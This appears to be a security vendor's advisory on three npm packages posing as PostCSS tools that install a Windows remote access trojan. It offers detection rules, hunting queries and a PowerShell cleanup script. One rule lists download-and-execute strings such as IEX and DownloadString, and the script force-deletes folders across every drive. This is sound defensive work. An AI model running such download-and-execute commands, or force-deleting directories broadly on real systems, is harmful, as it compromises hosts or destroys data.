Introduction
In June 2026, the software supply chain faced a renewed threat with the discovery of malicious packages published to the npm registry. Security researchers identified three distinct packages—aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser—designed to mimic legitimate PostCSS development tools.
While the download counts (ranging from 145 to 615) suggest a targeted or early-stage campaign, the payload is severe: a fully functional Windows Remote Access Trojan (RAT). For defenders, this underscores a critical reality: even low-volume package uploads can result in complete host compromise if they land in a development or build environment. This post provides the technical indicators and defensive playbooks required to identify and eradicate this threat.
Technical Analysis
Affected Platform and Products
- Platform: Windows (The payload is a Windows RAT, though the delivery mechanism is Node.js/npm which runs cross-platform).
- Registry: npm (Node Package Manager).
- Malicious Packages:
aes-decode-runner-pro(145 downloads)postcss-minify-selector(256 downloads)postcss-minify-selector-parser(615 downloads)
Vulnerability and Attack Chain
This threat is not a CVE-exploitation event but a Supply Chain Compromise via typosquatting and dependency confusion.
- Initial Compromise: A developer or build agent executes
npm installtargeting one of the malicious package names. - Execution: The package’s
package.contains pre-install or post-install scripts that trigger automatically upon installation. - Payload Delivery: These scripts retrieve and execute a Windows binary.
- RAT Installation: The binary establishes a Reverse Shell or C2 (Command and Control) connection, granting the attacker remote access to the Windows host.
Exploitation Status
- Status: Confirmed Active. The packages were published recently and have accumulated confirmed downloads.
- Risk: High. Successful execution leads to full remote control of the developer workstation, potentially allowing lateral movement to the broader corporate network.
Detection & Response
SIGMA Rules
---
title: Potential Malicious npm Package Installation - PostCSS RAT
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects the installation of identified malicious npm packages associated with Windows RAT delivery in June 2026.
references:
- https://thehackernews.com/2026/06/malicious-npm-packages-pose-as-postcss.html
author: Security Arsenal
date: 2026/06/02
tags:
- attack.initial_access
- attack.t1195.002
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\npm.cmd'
- '\npm.exe'
CommandLine|contains:
- 'aes-decode-runner-pro'
- 'postcss-minify-selector'
- 'postcss-minify-selector-parser'
condition: selection
falsepositives:
- Legitimate installation of a package with a similar name (unlikely given specific malicious strings)
level: critical
---
title: Suspicious Child Process from Node.js (RAT Activity)
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects Node.js spawning suspicious Windows shell commands commonly associated with RAT deployment or execution.
references:
- https://attack.mitre.org/techniques/T1059/
author: Security Arsenal
date: 2026/06/02
tags:
- attack.execution
- attack.t1059.003
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\node.exe'
selection_child:
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\wscript.exe'
CommandLine|contains:
- 'Invoke-WebRequest'
- 'DownloadString'
- 'IEX'
- '/c'
condition: selection_parent and selection_child
falsepositives:
- Legitimate build scripts executing system commands
level: medium
KQL (Microsoft Sentinel / Defender)
// Hunt for installations of the specific malicious npm packages
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has_any ("npm install", "npm i")
| where ProcessCommandLine has_any ("aes-decode-runner-pro", "postcss-minify-selector", "postcss-minify-selector-parser")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| extend Severity = "High"
Velociraptor VQL
-- Hunt for the presence of the malicious package directories in node_modules
SELECT FullPath, Size, Mtime
FROM glob(globs="*/node_modules/aes-decode-runner-pro/*")
UNION ALL
SELECT FullPath, Size, Mtime
FROM glob(globs="*/node_modules/postcss-minify-selector/*")
UNION ALL
SELECT FullPath, Size, Mtime
FROM glob(globs="*/node_modules/postcss-minify-selector-parser/*")
Remediation Script (PowerShell)
# Remediation Script for Malicious npm Packages (June 2026)
# Requires Administrative Privileges
Write-Host "Starting scan for malicious npm packages..." -ForegroundColor Cyan
$MaliciousPackages = @(
"aes-decode-runner-pro",
"postcss-minify-selector",
"postcss-minify-selector-parser"
)
$FoundThreats = $false
# Common locations for node_modules (User profile and global npm path)
$SearchPaths = @(
"$env:USERPROFILE\node_modules",
"$env:APPDATA\npm\node_modules",
"C:\Program Files\nodejs\node_modules",
"C:\Users\*\node_modules" # Note: Wildcards require specific administrative tools, scanning current user drives primarily
)
# Scan current drive root for typical project structures
Get-PSDrive -PSProvider FileSystem | ForEach-Object {
$DriveRoot = $_.Root
Write-Host "Scanning Drive $DriveRoot..." -ForegroundColor Yellow
foreach ($Package in $MaliciousPackages) {
$Pattern = "*\node_modules\$Package"
try {
$DetectedPaths = Get-ChildItem -Path $DriveRoot -Filter $Package -Recurse -ErrorAction SilentlyContinue -Directory
foreach ($Path in $DetectedPaths) {
$FoundThreats = $true
Write-Host "[THREAT FOUND] Malicious package detected at: $($Path.FullName)" -ForegroundColor Red
# Attempt to remove the directory
try {
Remove-Item -Path $Path.FullName -Recurse -Force
Write-Host "[REMOVED] Successfully deleted: $($Path.FullName)" -ForegroundColor Green
}
catch {
Write-Host "[ERROR] Failed to delete $($Path.FullName). Manual removal required." -ForegroundColor Red
}
}
}
catch {
# Ignore access errors during scan
}
}
}
if (-not $FoundThreats) {
Write-Host "No malicious packages found on local system." -ForegroundColor Green
} else {
Write-Host "Remediation complete. Please rotate any credentials used on this machine since installation." -ForegroundColor Cyan
}
Remediation
-
Immediate Removal: Run the provided PowerShell script to locate and delete the malicious
node_modulesdirectories. Alternatively, manually delete the following folders from any project directories:node_modules/aes-decode-runner-pronode_modules/postcss-minify-selectornode_modules/postcss-minify-selector-parser
-
Sanitize
package.: Audit allpackage.files in your environment. Remove any references to these packages underdependencies,devDependencies, orpeerDependencies. -
Credential Reset: Since the payload is a Windows RAT, assume that credentials (tokens, SSH keys, browser sessions) may have been exfiltrated. Force a password rotation for the affected accounts and revoke/reissue API keys.
-
Re-image Compromised Hosts: If a package installation was successful and the process executed, the most secure remediation is to wipe and re-image the affected Windows workstation. Simply deleting the file does not guarantee the removal of the RAT persistence mechanism.
-
Dependency Review: Implement a policy requiring manual review or automated approval (using tools like GitHub Dependabot or Snyk) for all new package additions, specifically checking for typosquatting of popular libraries like PostCSS.
Related Resources
Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.